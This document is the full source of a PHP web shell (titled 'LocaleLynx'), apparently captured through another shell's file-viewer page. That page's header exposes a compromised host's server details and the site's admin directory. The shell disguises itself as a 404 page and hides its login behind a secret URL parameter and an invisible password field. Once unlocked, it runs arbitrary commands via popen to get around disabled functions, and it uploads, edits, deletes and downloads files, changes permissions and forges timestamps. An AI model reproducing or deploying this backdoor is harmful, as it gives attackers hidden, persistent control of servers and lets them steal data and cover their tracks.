|
Server IP : 145.79.210.100 / Your IP : 216.73.216.101 Web Server : LiteSpeed System : Linux in-mum-web1954.main-hosting.eu 5.14.0-570.26.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 16 09:12:04 EDT 2025 x86_64 User : u474798400 ( 474798400) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u474798400/domains/excentia.in/public_html/admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
session_start();
error_reporting(0);
$pass = "babihutan-v1";
$param = "mega-super";
$value = "mega-super";
$sess = md5(__FILE__ . $_SERVER['HTTP_HOST']);
if (!isset($_SESSION[$sess])) {
if (isset($_GET[$param]) && $_GET[$param] === $value) {
$_SESSION[$sess] = true;
} else {
http_response_code(404);
?>
<html><head><title>404 Not Found</title></head>
<style> input { display:none; } </style>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p><hr>
</body></html>
<?php
exit;
}
}
if (!isset($_SESSION['ok'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['p'] === $pass) {
$_SESSION['ok'] = true;
header("Location: ?");
exit;
}
?>
<html><head><title>404 Not Found</title></head>
<style>
body { background:#fff; }
form { position:fixed; bottom:1vh; left:50%; transform:translateX(-50%); }
input[type="password"] {
background:#fff; border:1px solid #fff; color:#fff;
width:1px; height:1px; opacity:0;
}
</style>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p><hr>
<form method="post">
<input type="password" name="p" autofocus>
</form>
</body></html>
<?php
exit;
}
if (isset($_GET['out'])) {
session_destroy();
header("Location: ?");
exit;
}
$homePath = realpath(getcwd());
$path = isset($_GET['p']) ? urldecode($_GET['p']) : $homePath;
$path = realpath($path);
if (!$path || !is_dir($path)) $path = $homePath;
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_POST['izinP'], $_POST['baruP'])) {
$target = realpath($path . DIRECTORY_SEPARATOR . $_POST['izinP']);
if ($target && strpos($target, $path) === 0) {
chmod($target, octdec($_POST['baruP']));
}
} elseif (isset($_POST['waktuP'], $_POST['waktuPP'])) {
$target = realpath($path . DIRECTORY_SEPARATOR . $_POST['waktuP']);
if ($target && strpos($target, $path) === 0) {
$time = strtotime($_POST['waktuPP']);
if ($time !== false) touch($target, $time);
}
} elseif (isset($_POST['lah']) && !empty($_POST['lah'])) {
$output = '';
$proc = popen($_POST['lah'] . " 2>&1", "r");
while (!feof($proc)) {
$output .= fread($proc, 4096);
}
pclose($proc);
} elseif (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $path . DIRECTORY_SEPARATOR . $_FILES['file']['name']);
} elseif (isset($_POST['ed'], $_POST['content'])) {
file_put_contents($path . DIRECTORY_SEPARATOR . $_POST['ed'], $_POST['content']);
} elseif (isset($_POST['baruF'])) {
mkdir($path . DIRECTORY_SEPARATOR . $_POST['baruF']);
} elseif (isset($_POST['baruFF'], $_POST['lamaF'])) {
$old = realpath($path . DIRECTORY_SEPARATOR . $_POST['lamaF']);
$new = dirname($old) . DIRECTORY_SEPARATOR . basename($_POST['baruFF']);
if (strpos($old, $path) === 0) rename($old, $new);
}
}
if (isset($_GET['de'])) {
$target = realpath($path . DIRECTORY_SEPARATOR . $_GET['de']);
if ($target && strpos($target, $path) === 0) {
is_dir($target) ? rmdir($target) : unlink($target);
}
}
if (isset($_GET['d'])) {
$file = realpath($path . DIRECTORY_SEPARATOR . $_GET['d']);
if ($file && strpos($file, $path) === 0 && is_file($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
}
if (isset($_GET['e'])) {
$file = realpath($path . DIRECTORY_SEPARATOR . $_GET['e']);
if ($file && strpos($file, $path) === 0 && is_file($file)) {
$content = file_get_contents($file);
echo "<form method='post'>
<input type='hidden' name='ed' value='".htmlspecialchars($_GET['e'])."'>
<textarea name='content' rows='20' style='width:100%'>".htmlspecialchars($content)."</textarea><br>
<button type='submit'>Save</button>
</form><hr>";
}
}
function formatSize($bytes) {
if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB';
elseif ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB';
elseif ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB';
elseif ($bytes > 1) return $bytes . ' bytes';
elseif ($bytes == 1) return '1 byte';
else return '0 bytes';
}
function icon($file) {
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
$icons = [
'jpg'=>'image', 'jpeg'=>'image', 'png'=>'image', 'gif'=>'image',
'zip'=>'file-zip', 'rar'=>'file-zip', 'tar'=>'file-zip',
'php'=>'file-code', 'html'=>'file-code', 'css'=>'file-code', 'js'=>'file-code',
'pdf'=>'file-pdf', 'doc'=>'file-word', 'docx'=>'file-word',
'xls'=>'file-excel', 'xlsx'=>'file-excel',
'mp3'=>'music', 'mp4'=>'film', 'avi'=>'film'
];
return $icons[$ext] ?? 'file';
}
$files = scandir($path);
$folders = [];
$regularFiles = [];
foreach ($files as $file) {
if ($file === '.') continue;
$full = realpath($path . DIRECTORY_SEPARATOR . $file);
if (!$full || strpos($full, $path) !== 0) continue;
if (is_dir($full)) $folders[] = $file;
else $regularFiles[] = $file;
}
$combined = array_merge($folders, $regularFiles);
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>LocaleLynx</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">
<style>
input.chmod-input, input.time-input { width: 90px; text-align: center; }
form.inline { display: inline-block; margin: 0; }
td > form { margin: 0; padding: 0; }
</style>
</head>
<body class="p-4">
<div class="container">
<div class="d-flex justify-content-end mb-3">
<a href="?out" class="btn btn-sm btn-danger"><i class="fa fa-sign-out-alt"></i> Logout</a></div>
<h3 class="mb-3"><i class="fa fa-folder-open"></i> LocaleID</h3>
<p><strong>Lokasi :</strong>
<?php
$parts = explode(DIRECTORY_SEPARATOR, trim($path, DIRECTORY_SEPARATOR));
$current = '';
echo '<a href="?p=' . urlencode(DIRECTORY_SEPARATOR) . '">Root</a>';
foreach ($parts as $part) {
$current .= DIRECTORY_SEPARATOR . $part;
echo ' / <a href="?p=' . urlencode($current) . '">' . htmlspecialchars($part) . '</a>';
}
?>
</p>
<p>
<a href="?p=<?= urlencode($homePath) ?>" class="btn btn-outline-dark btn-sm"><i class="fa fa-home"></i> Home</a>
</p>
<form method="post" enctype="multipart/form-data" class="d-flex gap-2 mb-3">
<input type="file" name="file" class="form-control" required>
<button class="btn btn-primary" type="submit">Upload</button>
</form>
<form method="post" class="mb-3 d-flex gap-2">
<input type="text" name="baruF" class="form-control" placeholder="Nama Folder" required>
<button class="btn btn-success" type="submit">BuatFolder</button>
</form>
<hr>
<form method="post">
<input type="text" name="lah" class="form-control mb-2" placeholder="ls -la /etc" required>
<button class="btn btn-outline-dark" type="submit">Gass</button>
</form>
<?php if (isset($output)): ?>
<pre class="mt-3 bg-light p-2 border"><?= htmlspecialchars($output) ?></pre>
<?php endif; ?>
<hr>
<table class="table table-bordered table-sm align-middle">
<thead class="table-light">
<tr>
<th>Nama</th><th>Ukuran File</th><th>Waktu Modifikasi</th><th>Izin File</th><th>Pilihan Eksekusi</th>
</tr>
</thead>
<tbody>
<?php foreach ($combined as $file):
$full = realpath($path . DIRECTORY_SEPARATOR . $file);
$isDir = is_dir($full);
$perm = substr(sprintf('%o', fileperms($full)), -4);
$mod = date("Y-m-d H:i:s", filemtime($full));
?>
<tr>
<td><i class="fa fa-<?= $isDir ? 'folder' : icon($file) ?>"></i>
<?= $isDir ? "<a href='?p=".urlencode($full)."'>".htmlspecialchars($file)."</a>" : htmlspecialchars($file) ?></td>
<td><?= $isDir ? '-' : formatSize(filesize($full)) ?></td>
<td>
<form method="post" class="inline">
<input type="hidden" name="waktuP" value="<?= htmlspecialchars($file) ?>">
<input type="text" name="waktuPP" class="time-input" value="<?= $mod ?>">
</form>
</td>
<td>
<form method="post" class="inline">
<input type="hidden" name="izinP" value="<?= htmlspecialchars($file) ?>">
<input type="text" name="baruP" class="chmod-input" value="<?= $perm ?>" maxlength="4">
</form>
</td>
<td>
<?php if (!$isDir): ?>
<a class="btn btn-sm btn-secondary" href="?p=<?= urlencode($path) ?>&e=<?= urlencode($file) ?>"><i class="fa fa-edit"></i></a>
<a class="btn btn-sm btn-info" href="?p=<?= urlencode($path) ?>&d=<?= urlencode($file) ?>"><i class="fa fa-download"></i></a>
<?php endif; ?>
<a class="btn btn-sm btn-danger" href="?p=<?= urlencode($path) ?>&de=<?= urlencode($file) ?>" onclick="return confirm('Delete <?= htmlspecialchars($file) ?>?')"><i class="fa fa-trash"></i></a>
<form method="post" class="d-inline">
<input type="hidden" name="lamaF" value="<?= htmlspecialchars($file) ?>">
<input type="text" name="baruFF" value="<?= htmlspecialchars($file) ?>" class="form-control d-inline" style="width:120px;display:inline;">
<button class="btn btn-sm btn-warning" type="submit"><i class="fa fa-sync"></i></button>
</form>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
</body>
</html>